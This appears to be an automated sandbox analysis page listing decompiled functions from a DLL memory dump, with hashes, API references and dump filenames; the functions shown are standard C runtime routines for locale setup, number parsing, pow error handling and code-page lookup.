0x6d49c241
0x6d49c243
0x6d49c245
0x6d49c247
0x6d49c249
0x6d49c24f
0x6d49c252
0x6d49c257
0x6d49c261
0x6d49c265
0x6d49c26d
0x6d49c26e
0x6d49c26f
0x6d49c270
0x6d49c273
0x6d49c27b
0x6d49c27b
0x6d49c27d
0x6d49c282
0x6d49c287
0x6d49c287
0x6d49c282
0x6d49c245
0x6d49c28e
0x6d49c294

APIs

__EH_prolog3.LIBCMT ref: 6D49C230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D49C265

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D49C276

Part of subcall function 6D49BD9F: __EH_prolog3.LIBCMT ref: 6D49BDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D49C287

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: a747e40744b64421a2a1dc046ed1a4d5c194912340985d1d08da3b5bd1331bdb
Instruction ID: 2d58a2bca7c369a1232319f182ae57f34d5b3e4e6f9e182745e2222a25bf3ac6
Opcode Fuzzy Hash: a747e40744b64421a2a1dc046ed1a4d5c194912340985d1d08da3b5bd1331bdb
Instruction Fuzzy Hash: 650169B1945216DADB00DBA58880EAEBFB4AF54785F26011AE655AB284CB708E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4618A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D4618A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6D4A00AC(0x6d4e7d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6D49F8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6D461450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6D461703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6d4ea9c0;
						E6D461928(_t30, _t16);
						 *_t28 = _t30;
						E6D4614CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6D4A0075(_t12);
			}

0x6d4618a7
0x6d4618ac
0x6d4618b1
0x6d4618b3
0x6d4618b6
0x6d4618bf
0x6d4618c2
0x6d4618c8
0x6d4618d5
0x6d4618da
0x6d4618e1
0x6d4618e7
0x6d4618ef
0x6d4618f1
0x6d4618f1
0x6d4618b6
0x6d4618f8
0x6d4618fe

APIs

__EH_prolog3.LIBCMT ref: 6D4618A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D4618D5

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

ctype.LIBCPMT ref: 6D4618E7

Part of subcall function 6D461928: __Getctype.LIBCPMT ref: 6D461937
Part of subcall function 6D461928: __Getcvt.LIBCPMT ref: 6D461949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D4618F1

Part of subcall function 6D4614CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D4614F5
Part of subcall function 6D4614CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461566

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 4407aa01f9970e07e2f515870267873ce0a0fe8aec80063ecec9a298b590654a
Instruction ID: 6ce2f715be56a6e7da69625fc68eeecc0c54def64766c4849f0c3225a505cf11
Opcode Fuzzy Hash: 4407aa01f9970e07e2f515870267873ce0a0fe8aec80063ecec9a298b590654a
Instruction Fuzzy Hash: 95F05EB1918795AFDB10DF50C441FAD77A4AF507AAF22440DE34AAB288DB745E00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D48B968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6D4A00E0(0x6d4e86b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6D48A2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6d4ea26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6D48DA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6D48A0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6d4ea26c("0123456789ABCDEFabcdef-+Xx", 0x6d4eba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6D48D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6D48D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6D486BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6D48D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6D482B76(_t252 - 0x44);
											E6D482B76(_t252 - 0x5c);
											return E6D4A008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6D48C59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6D489DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6D48C59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6D4886F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6D48BD8B(_t198);
									} while (E6D48D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6D48C59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6D48BD8B(_t198);
								_t185 = E6D48D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6D48C59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6D48BD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6D48C59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6D48C59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6D48C59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6D48BD8B(_t198);
						goto L13;
					}
				}
			}

0x6d48b968
0x6d48b96f
0x6d48b977
0x6d48b97a
0x6d48b980
0x6d48b983
0x6d48b987
0x6d48b98a
0x6d48b98f
0x6d48b998
0x6d48b99d
0x6d48b9a5
0x6d48b9a7
0x6d48b9ab
0x6d48b9af
0x6d48b9be
0x6d48b9b1
0x6d48b9b1
0x6d48b9b1
0x6d48b9c4
0x6d48b9e1
0x6d48b9e9
0x6d48b9eb
0x6d48b9f5
0x6d48b9f8
0x6d48b9ff
0x6d48ba3f
0x6d48ba44
0x6d48ba4a
0x6d48ba4b
0x6d48ba54
0x6d48ba5a
0x6d48ba60
0x6d48ba69
0x6d48ba6b
0x6d48ba6b
0x6d48ba6d
0x6d48ba74
0x6d48ba77
0x6d48ba7a
0x6d48ba7d
0x6d48ba84
0x6d48bb04
0x6d48bb04
0x6d48bb06
0x6d48bb1e
0x6d48bb21
0x6d48bb2a
0x6d48bb31
0x6d48bb35
0x6d48bb45
0x6d48bb49
0x6d48bb4b
0x6d48bb4e
0x6d48bb55
0x6d48bc5d
0x6d48bc60
0x6d48bc63
0x6d48bc63
0x6d48bc66
0x6d48bc6a
0x6d48bc6d
0x6d48bc6f
0x6d48bc6f
0x6d48bc74
0x6d48bcdd
0x6d48bcdd
0x00000000
0x6d48bc76
0x6d48bc76
0x6d48bc7a
0x6d48bc7f
0x00000000
0x00000000
0x6d48bc81
0x6d48bc84
0x6d48bca5
0x6d48bca7
0x6d48bcc2
0x6d48bcc2
0x6d48bcc8
0x6d48bcca
0x6d48bcca
0x00000000
0x6d48bcc8
0x6d48bcb0
0x6d48bcb3
0x6d48bcb5
0x6d48bcb5
0x6d48bcbd
0x6d48bcc0
0x00000000
0x00000000
0x00000000
0x00000000
0x6d48bcc0
0x6d48bc89
0x6d48bc8c
0x6d48bc92
0x6d48bc94
0x6d48bc97
0x6d48bc97
0x6d48bca0
0x6d48bca3
0x00000000
0x00000000
0x00000000
0x00000000
0x6d48bca3
0x6d48bcce
0x6d48bcd2
0x6d48bcd5
0x6d48bcd7
0x6d48bcda
0x6d48bcda
0x6d48bce0
0x6d48bce3
0x6d48bce6
0x6d48bcee
0x6d48bcfa
0x6d48bcfa
0x6d48bc74
0x6d48bb5b
0x6d48bb5e
0x6d48bb62
0x6d48bb66
0x6d48bb66
0x6d48bb6e
0x6d48bb71
0x6d48bb80
0x6d48bb88
0x6d48bb8b
0x6d48bb90
0x6d48bbdc
0x6d48bbdf
0x6d48bbe2
0x6d48bbe5
0x6d48bbe8
0x6d48bbea
0x6d48bbea
0x6d48bbec
0x6d48bbf0
0x6d48bc42
0x6d48bc44
0x00000000
0x00000000
0x6d48bc46
0x6d48bc4c
0x6d48bc4e
0x6d48bc4e
0x6d48bc54
0x6d48bc59
0x00000000
0x6d48bc56
0x6d48bc56
0x00000000
0x6d48bc56
0x6d48bbf2
0x6d48bbf2
0x6d48bbf6
0x00000000
0x00000000
0x6d48bbf8
0x6d48bbfc
0x6d48bc10
0x6d48bbfe
0x6d48bc00
0x6d48bc05
0x6d48bc08
0x6d48bc0b
0x6d48bc0b
0x6d48bc13
0x6d48bc16
0x00000000
0x6d48bc18
0x6d48bc1d
0x6d48bc22
0x6d48bc22
0x00000000
0x6d48bc22
0x6d48bc16
0x6d48bb92
0x6d48bb96
0x6d48bb9c
0x6d48bb9f
0x6d48bba1
0x6d48bbab
0x6d48bbae
0x6d48bbb2
0x6d48bbb2
0x6d48bbab
0x6d48bbb9
0x6d48bbbc
0x6d48bbc0
0x6d48bbc2
0x6d48bbc2
0x6d48bbc9
0x6d48bbcf
0x6d48bbd2
0x6d48bbd4
0x6d48bbd4
0x6d48bbd7
0x6d48bbd7
0x6d48bbc9
0x6d48bc23
0x6d48bc25
0x6d48bc34
0x6d48bc3c
0x6d48bc3f
0x00000000
0x6d48bc3f
0x6d48bb08
0x6d48bb08
0x6d48bb0a
0x00000000
0x00000000
0x6d48bb0c
0x6d48bb1b
0x00000000
0x6d48bb1b
0x6d48ba89
0x6d48ba8d
0x6d48ba8d
0x6d48ba98
0x00000000
0x6d48ba9a
0x6d48ba9e
0x6d48baa1
0x6d48baa4
0x6d48baae
0x6d48bab5
0x6d48bafd
0x6d48bafd
0x6d48baff
0x00000000
0x00000000
0x6d48bb03
0x00000000
0x6d48bb03
0x6d48baba
0x6d48babe
0x6d48babe
0x6d48bac3
0x6d48bac9
0x6d48bae0
0x6d48bae2
0x6d48baef
0x6d48baf0
0x6d48baf3
0x6d48baf6
0x00000000
0x00000000
0x00000000
0x00000000
0x6d48bacb
0x6d48bacf
0x6d48bad3
0x6d48bad8
0x6d48bad8
0x6d48bade
0x00000000
0x00000000
0x00000000
0x00000000
0x6d48bade
0x6d48bac9
0x6d48ba98
0x6d48ba62
0x6d48ba64
0x6d48ba64
0x00000000
0x6d48ba64
0x6d48ba56
0x00000000
0x6d48ba01
0x6d48ba04
0x6d48ba08
0x6d48ba08
0x6d48ba0d
0x6d48ba13
0x6d48ba1a
0x6d48ba1e
0x6d48ba22
0x6d48ba27
0x6d48ba27
0x6d48ba2a
0x6d48ba2d
0x00000000
0x6d48ba2f
0x6d48ba2f
0x00000000
0x6d48ba2f
0x6d48ba15
0x6d48ba15
0x6d48ba32
0x6d48ba37
0x6d48ba3a
0x00000000
0x6d48ba3a
0x6d48ba13

APIs

__EH_prolog3_GS.LIBCMT ref: 6D48B96F

Part of subcall function 6D48A2F1: __EH_prolog3.LIBCMT ref: 6D48A2F8
Part of subcall function 6D48A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6D48A302
Part of subcall function 6D48A2F1: int.LIBCPMT ref: 6D48A319
Part of subcall function 6D48A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A373

_Find_unchecked1.LIBCPMT ref: 6D48BB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6D48B9D7

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 07fbadcd12975efb63b7fdd4047617b6f7c8fb948c0a7bbf43cef6b61c66faf0
Instruction ID: b4048103f1037e305d4078d5fc8b993427c738bd8d8b8315bbc9ba4004d2ad30
Opcode Fuzzy Hash: 07fbadcd12975efb63b7fdd4047617b6f7c8fb948c0a7bbf43cef6b61c66faf0
Instruction Fuzzy Hash: 7CC16A30E092898FDF12DAA8C490FEDBBB2AF46384F24449DC8956B347CB60DD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C60ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4C617D

Strings

pow, xrefs: 6D4C6155, 6D4C6172

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 745f6252630327e852f83b101fa7fb0a86f597da1940878ca4e6b089bc0d5d9b
Instruction ID: e82551c12410f96ab62f874a41ed0df894900d697346a383d5401327f8db37ef
Opcode Fuzzy Hash: 745f6252630327e852f83b101fa7fb0a86f597da1940878ca4e6b089bc0d5d9b
Instruction Fuzzy Hash: D1513565E1D10396DB41BB18C960B7A6BB4EB41742F30CD58E0D2823B9EF648C91CAC7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6D4DDBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6D4D4323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6d4f2f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6d4f2f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6D4CBF09(_t23, _t23);
									goto L25;
								}
								if(E6D4D4323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x6d4ddbb4
0x6d4ddbb5
0x6d4ddbbc
0x6d4ddc62
0x6d4ddc76
0x6d4ddc7b
0x6d4ddc7d
0x6d4ddc83
0x6d4ddc86
0x6d4ddc88
0x6d4ddc8a
0x6d4ddc8a
0x6d4ddc90
0x6d4ddc95
0x6d4ddc95
0x6d4ddc7f
0x6d4ddc7f
0x00000000
0x6d4ddc7f
0x6d4ddbc2
0x6d4ddbc7
0x00000000
0x00000000
0x6d4ddbcd
0x6d4ddbd2
0x6d4ddbd4
0x6d4ddbd4
0x6d4ddbda
0x00000000
0x00000000
0x6d4ddbdf
0x6d4ddbf6
0x6d4ddbf6
0x6d4ddbff
0x6d4ddc01
0x00000000
0x00000000
0x6d4ddc03
0x6d4ddc08
0x6d4ddc0a
0x6d4ddc0a
0x6d4ddc10
0x00000000
0x00000000
0x6d4ddc15
0x6d4ddc33
0x6d4ddc33
0x6d4ddc35
0x6d4ddc5a
0x00000000
0x6d4ddc5f
0x6d4ddc52
0x00000000
0x00000000
0x6d4ddc54
0x00000000
0x6d4ddc54
0x6d4ddc17
0x6d4ddc1f
0x00000000
0x00000000
0x6d4ddc21
0x6d4ddc24
0x6d4ddc2a
0x00000000
0x00000000
0x00000000
0x6d4ddc2c
0x6d4ddc2e
0x6d4ddc30
0x6d4ddc30
0x00000000
0x6d4ddc30
0x6d4ddbe1
0x6d4ddbe9
0x00000000
0x00000000
0x6d4ddbeb
0x6d4ddbee
0x6d4ddbf4
0x00000000
0x00000000
0x00000000
0x6d4ddbf4
0x6d4ddbfa
0x6d4ddbfc
0x6d4ddbfc
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4DDE50,?,00000050,?,?,?,?,?), ref: 6D4DDC8A

Strings

ACP, xrefs: 6D4DDBCD
OCP, xrefs: 6D4DDC03

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

